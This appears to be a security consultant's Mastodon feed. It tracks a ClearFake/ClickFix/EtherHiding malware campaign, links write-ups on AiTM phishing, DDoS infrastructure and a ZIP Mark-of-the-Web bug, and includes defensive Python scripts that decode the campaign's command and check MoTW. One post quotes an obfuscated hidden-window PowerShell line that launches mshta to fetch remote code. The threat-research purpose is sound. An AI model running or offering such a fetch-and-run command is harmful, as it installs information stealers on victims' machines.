16 Followers
68 Following
23 Posts
Security Consultant. PurpleTeam. DFIR/IR
GitHub: https://github.com/ttakvam
@threatcat_ch my extractor broke from the changes :/ which payload? The logic for building the JS is using an array to build the command to run. Trying to figure it out and update the extractor. No luck as of yet :(

@threatcat_ch Been checking in on this campaign from time to time. New changes:

powershell -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://[DOMAIN]i=${usr_id}' -replace ']')

Also, the info stealer has been changed. Not certain which one as of now, but it seems very similar to ACR Stealer.
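An added example (not the poster's extractor and not code from the campaign): a small Python decoder for the command shape quoted above. It parses the ('...' -replace '...') expression, applies the replacement the way PowerShell's -replace does (case-insensitive regex substitution), and pulls out the binary, URL and hidden-window flag for an IOC feed. The sample command is constructed: the campaign domain is swapped for the reserved placeholder example.invalid, and ${usr_id} is kept as the template placeholder the post shows (assumed to be filled in by the loader's JS). The LOLBIN list is an assumption for generality; the post only shows mshta.

```python
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the one-liner quoted in the post above.
# The real command carries the campaign's domain; here it is swapped for the
# reserved placeholder example.invalid. ${usr_id} is left as the template
# placeholder the post shows (assumption: the loader's JS fills it in).
SAMPLE_COMMAND = (
    "powershell -w 1 powershell -Command "
    "('ms]]]ht]]]a]]].]]]exe https://example.invalid/?i=${usr_id}' -replace ']')"
)

# Matches  ('<payload>' -replace '<pattern>'[, '<replacement>'])
# Single-quoted PowerShell strings escape an embedded quote by doubling it.
_SQ = r"(?:[^']|'')*"
REPLACE_EXPR = re.compile(
    r"\(\s*'(?P<payload>" + _SQ + r")'\s+-replace\s+'(?P<pattern>" + _SQ + r")'"
    r"(?:\s*,\s*'(?P<replacement>" + _SQ + r")')?\s*\)",
    re.IGNORECASE,
)

# Hidden window: -w / -WindowStyle with 1 (ProcessWindowStyle.Hidden) or Hidden.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

# Binaries worth flagging when the decoded command hands them a URL.
# Assumption: mshta is what the post shows; the others are added for generality.
LOLBINS = {"mshta", "mshta.exe", "powershell", "powershell.exe", "curl", "curl.exe"}


def _unquote(s: str) -> str:
    """Undo PowerShell single-quote escaping ('' -> ')."""
    return s.replace("''", "'")


def deobfuscate(command: str) -> Optional[str]:
    """Evaluate the ('...' -replace '...') expression as PowerShell would.

    -replace is a case-insensitive .NET regex substitution. A lone ']' is a
    literal in both .NET and Python regex syntax, so re.sub reproduces it; the
    replacement is passed as a callable so no backslash or $ escapes apply.
    Returns None when no such expression is present or the pattern is not a
    regex Python can compile.
    """
    m = REPLACE_EXPR.search(command)
    if not m:
        return None
    payload = _unquote(m.group("payload"))
    pattern = _unquote(m.group("pattern"))
    replacement = _unquote(m.group("replacement") or "")
    try:
        return re.sub(pattern, lambda _: replacement, payload, flags=re.IGNORECASE)
    except re.error:
        return None


def extract_indicators(command: str) -> Dict[str, object]:
    """Decode one ClickFix command line and pull out what an IOC feed wants."""
    decoded = deobfuscate(command)
    result: Dict[str, object] = {
        "decoded": decoded,
        "binary": None,
        "urls": [],
        "hidden_window": bool(HIDDEN_WINDOW.search(command)),
        "suspicious": False,
    }
    if decoded is None:
        return result
    tokens = decoded.split()
    binary = tokens[0].lower() if tokens else None
    urls: List[str] = URL_RE.findall(decoded)
    result["binary"] = binary
    result["urls"] = urls
    result["suspicious"] = binary in LOLBINS and bool(urls)
    return result


if __name__ == "__main__":
    print(extract_indicators(SAMPLE_COMMAND))
```

For the sample command this yields mshta.exe as the binary, the single URL, and hidden_window set because `-w 1` is -WindowStyle Hidden. A new obfuscation (a different pattern, or a two-argument -replace) still decodes as long as the loader keeps the same expression shape; a change in the shape itself is what breaks an extractor and is what the post describes.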

The campaign employs the EtherHiding technique, where payloads are delivered from Web3 smart contracts and Cloudflare-hosted sites, spreading Vidar malware across ~5k infected WordPress websites. The campaign has been active for ~3 months as of 2024-11-24. #Binance #EtherHide #ClearFake #ClickFix #Malware #IOC #przepisyjoli ;)

https://security.szustak.pl/etherhide/etherhide.html?mst

EtherHiding and ClickFix: new mask of social engineering campaign

@cyberamateur did a writeup on this https://www.atea.no/siste-nytt/it-sikkerhet/investigating-a-clearfake-clickfix-etherhide-campaign/ also tracking the domains in the contract here https://github.com/ttakvam/ThreatResearch/blob/main/ClearFake-Dec-2024/IOCs/extracted_urls.txt something is up though. There is a secondary contract that updates when the victim runs the mshta command. This has not been updating the last two days. Tested and was not able to pass the captcha on infected sites 🥶
Investigating a ClearFake/ClickFix + Etherhide campaign

We have identified and tracked a new campaign utilizing the ClearFake and EtherHiding techniques. It infects legitimate websites, resulting in an information stealer.


๐Ÿ” TDR analysts discovered a new Adversary-in-the-Middle (#AiTM) #phishing kit, specifically targeting Microsoft 365 accounts and circumventing 2-step verification: Sneaky 2FA

https://blog.sekoia.io/sneaky-2fa-exposing-a-new-aitm-phishing-as-a-service/

#detection #sneaky2fa

Sneaky 2FA: exposing a new AiTM Phishing-as-a-Service

In this blog post, learn about Sneaky 2FA, a new Adversary-in-the-Middle (AiTM) phishing kit targeting Microsoft 365 accounts.

Sekoia.io Blog
ThreatResearch/ClearFake-Dec-2024/IOCs/extracted_urls.txt at main · ttakvam/ThreatResearch


GitHub
@threatcat_ch we shared our investigation on this today. This is using the BSC testnet for their contracts. https://www.atea.no/siste-nytt/it-sikkerhet/investigating-a-clearfake-clickfix-etherhide-campaign/ been tracking this for a little while. The loader seems to change from time to time. Still leads to #Lumma

Hey :)

Earlier, we teased some infrastructure details related to the pro-Russian hacktivist NoName057(16).
Today we published the full report, with all backend IPs, DDoS infrastructure IP ranges, some Stark-Industries insights, etc.:

https://team-cymru.com/post/a-blog-with-noname

@teamcymru_S2

A Blog with NoName

Further Insight into the Hacktivist Operation Targeting NATO and Affiliated Nations

Key Findings

NoName057(16) is a pro-Russian hacktivist operator / group, which has claimed responsibility for repeated Distributed Denial of Service (DDoS) attacks against entities in perceived anti-Russian countries since March 2022.

NoName057(16) back-end infrastructure is hosted in Russia and likely operated by individual(s) with experience in systems design / maintenance.

DDoS attack targeting instructions in

Team Cymru

Hello mastodon #infosec friends, I built a new website to better search for #Sentinel #AnalyticsRules.

https://analyticsrules.exchange

It is a searchable and filterable list of all Analytics rules in the public repository built automatically twice a day.

Feedback welcome

Microsoft Sentinel Analytic Rules


Microsoft has just released a patch for the ZIP MOTW vulnerability assigned as CVE-2022-41091.

I am happy to be able to finally drop my bug analysis write-up! 🔥

Enjoy and happy patching!
https://breakdev.org/zip-motw-bug-analysis/

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Windows ZIP extraction bug (CVE-2022-41049) lets attackers craft ZIP files that evade warnings on attempts to execute packaged files, even if the ZIP file was downloaded from the Internet.

BREAKDEV
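The check a practitioner wants after reading the bug description above is whether files extracted from an Internet-downloaded archive actually carry the Mark-of-the-Web, i.e. a Zone.Identifier alternate data stream with ZoneId 3 (Internet) or 4 (Restricted). This is an added Python example, not code from the breakdev write-up or from Microsoft; the Zone.Identifier content is a constructed sample in the format browsers write, and reading a real stream needs NTFS on Windows (on other platforms read_zone_identifier returns None and every file is reported as unmarked).

```python
import os
import sys
from typing import Dict, List, Optional

# Constructed sample of a Zone.Identifier stream as a browser writes it for an
# Internet download. ZoneId 3 = URLZONE_INTERNET; the URLs are placeholders.
SAMPLE_ZONE_IDENTIFIER = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/downloads/\r\n"
    "HostUrl=https://example.invalid/downloads/archive.zip\r\n"
)

URLZONE_INTERNET = 3
URLZONE_UNTRUSTED = 4


def parse_zone_identifier(stream: str) -> Dict[str, str]:
    """Parse the INI-style [ZoneTransfer] section into key/value pairs."""
    fields: Dict[str, str] = {}
    in_section = False
    for line in stream.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def zone_id(stream: Optional[str]) -> Optional[int]:
    """Return the numeric ZoneId, or None if the stream is absent or malformed."""
    if stream is None:
        return None
    try:
        return int(parse_zone_identifier(stream).get("ZoneId", ""))
    except ValueError:
        return None


def is_marked_from_internet(stream: Optional[str]) -> bool:
    """True when the stream says the file came from the Internet or an untrusted zone."""
    z = zone_id(stream)
    return z is not None and z >= URLZONE_INTERNET


def read_zone_identifier(path: str) -> Optional[str]:
    """Read a file's Zone.Identifier ADS on NTFS; None if absent or not on Windows."""
    if not sys.platform.startswith("win"):
        return None
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def unmarked_files(root: str) -> List[str]:
    """Walk an extracted tree and list files that carry no Internet MoTW.

    Run this against the output folder of an extractor to see whether the
    mark was propagated to the contents; only meaningful on NTFS/Windows.
    """
    missing: List[str] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if not is_marked_from_internet(read_zone_identifier(path)):
                missing.append(path)
    return missing


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for p in unmarked_files(target):
        print("no Internet MoTW:", p)
```

Running the script over a folder produced by extracting a downloaded ZIP shows at a glance which files SmartScreen and Office's Protected View will treat as local: any executable or macro-bearing document listed without a mark is exactly the condition the bug above exploits.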